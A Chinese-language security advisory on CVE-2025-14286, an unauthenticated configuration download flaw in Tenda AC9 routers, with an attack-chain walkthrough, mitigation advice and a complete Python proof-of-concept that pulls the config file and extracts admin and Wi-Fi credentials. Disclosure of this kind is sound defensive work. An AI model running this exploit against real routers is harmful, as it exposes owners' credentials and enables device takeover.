CVE-2025-14286 | Tenda AC9路由器配置下载接口信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-14286

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tenda AC9 15.03.05.14_multi

漏洞概述

CVE-2025-14286是影响Tenda AC9路由器15.03.05.14_multi版本的一个信息泄露漏洞。该漏洞存在于路由器的Web管理界面配置下载功能中，攻击者可以通过未授权访问/cgi-bin/DownloadCfg.jpg接口，直接下载路由器的配置文件而无需任何认证。配置文件通常包含路由器的网络设置、WAN/LAN配置、无线网络凭据、管理员账户密码哈希等敏感信息。攻击者获取这些信息后，可以进一步进行横向移动，破解管理员密码，甚至在某些情况下可以修改配置并上传恶意固件，实现对路由器的完全控制。由于该漏洞的CVSS评分为5.3，属于中危级别，且攻击复杂度低，无需认证即可利用，因此对使用该型号路由器的用户构成较大安全威胁。建议用户及时关注厂商更新，升级到最新固件版本。

技术细节

该漏洞的技术根源在于Tenda AC9路由器Web服务器的访问控制机制缺陷。具体问题出在/cgi-bin/DownloadCfg.jpg这个CGI脚本上，该脚本本应仅允许已认证的管理员用户下载配置文件，但实际上缺少必要的身份验证检查。攻击者可以直接构造HTTP GET请求访问该URL，服务器端会直接返回包含完整配置信息的文件内容。从HTTP协议层面分析，该请求不需要携带任何Session Cookie或认证Token，服务器也不会进行任何权限校验。返回的配置文件通常为加密或编码后的文本文件，但攻击者可以轻松获取这些数据。配置文件格式通常是路由器厂商自定义的，包含关键字段如：lan_ipaddr（LAN口IP）、wan_ipaddr（WAN口IP）、admin_username、admin_password（通常为MD5哈希）、wireless_ssid、wireless_password等。攻击者获取配置文件后，可以通过逆向分析配置格式，提取出管理员密码哈希并进行离线暴力破解，从而获得路由器管理权限。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标为Tenda AC9路由器，确认Web管理界面可访问（默认IP通常为192.168.0.1）

STEP 2

步骤2

漏洞探测：攻击者直接向/cgi-bin/DownloadCfg.jpg端点发送HTTP GET请求，无需任何认证参数

STEP 3

步骤3

配置提取：服务器响应返回完整的路由器配置文件，包含网络设置和认证凭据

STEP 4

步骤4

密码破解：攻击者提取配置文件中的admin_password字段（通常为MD5哈希），进行离线暴力破解

STEP 5

步骤5

权限提升：使用破解的管理员凭据登录Web管理界面，获取路由器完全控制权

STEP 6

步骤6

持久化控制：攻击者可修改DNS设置、植入恶意脚本或上传含有后门的固件，实现长期控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-14286 PoC - Tenda AC9 Configuration File Download
This PoC demonstrates the information disclosure vulnerability in Tenda AC9 routers.
The /cgi-bin/DownloadCfg.jpg endpoint allows unauthenticated configuration download.
"""

import requests
import sys
import re

def extract_config_info(config_text):
    """Extract sensitive information from configuration file"""
    patterns = {
        'LAN IP': r'lan_ipaddr=([^&\s]+)',
        'WAN IP': r'wan_ipaddr=([^&\s]+)',
        'Admin User': r'admin_username=([^&\s]+)',
        'Admin Password Hash': r'admin_password=([^&\s]+)',
        'Wireless SSID': r'wireless_ssid=([^&\s]+)',
        'Wireless Password': r'wireless_password=([^&\s]+)',
        'MAC Address': r'macaddr=([^&\s]+)'
    }
    
    extracted = {}
    for key, pattern in patterns.items():
        match = re.search(pattern, config_text)
        if match:
            extracted[key] = match.group(1)
    
    return extracted

def exploit(target_ip):
    """Exploit the vulnerability"""
    target_url = f"http://{target_ip}/cgi-bin/DownloadCfg.jpg"
    
    print(f"[*] Target: {target_ip}")
    print(f"[*] Exploiting CVE-2025-14286...")
    print(f"[*] Requesting: {target_url}")
    
    try:
        # Send unauthenticated request to download configuration
        response = requests.get(target_url, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Successfully downloaded configuration file!")
            print(f"[+] File size: {len(response.content)} bytes")
            
            # Save raw configuration
            with open(f'config_{target_ip.replace(".", "_")}.bin', 'wb') as f:
                f.write(response.content)
            print(f"[+] Configuration saved to config file")
            
            # Try to decode and extract information
            try:
                config_text = response.content.decode('utf-8', errors='ignore')
                extracted_info = extract_config_info(config_text)
                
                if extracted_info:
                    print("\n[+] Extracted Sensitive Information:")
                    for key, value in extracted_info.items():
                        print(f"    {key}: {value}")
                else:
                    print("[*] Could not parse configuration format")
                    print("[*] First 500 bytes of response:")
                    print(response.content[:500])
                    
            except Exception as e:
                print(f"[-] Error parsing configuration: {e}")
                
            return True
        else:
            print(f"[-] Failed to download configuration. Status: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        print(f"Example: {sys.argv[0]} 192.168.0.1")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit(target)

影响范围

Tenda AC9 15.03.05.14_multi

防御指南

临时缓解措施

立即采取以下临时缓解措施：1）关闭路由器的远程管理功能，将Web管理界面限制在本地局域网访问；2）修改默认的管理员密码为高强度密码；3）在路由器防火墙上屏蔽对80和443端口的外网访问；4）如果暂时无法升级固件，可考虑使用访问控制列表限制对/cgi-bin/目录的访问；5）监控网络流量，关注异常的配置文件请求模式；6）关注Tenda官方安全公告，及时获取固件更新信息。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14286
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14286
3 Details https://www.cvedetails.com/cve/CVE-2025-14286/
4 VulDB https://vuldb.com/cve/CVE-2025-14286
5 Link https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN11.md
6 Link https://vuldb.com/?ctiid.334874
7 Link https://vuldb.com/?id.334874
8 Link https://vuldb.com/?submit.702723
9 Link https://www.tenda.com.cn/
10 Link https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN11.md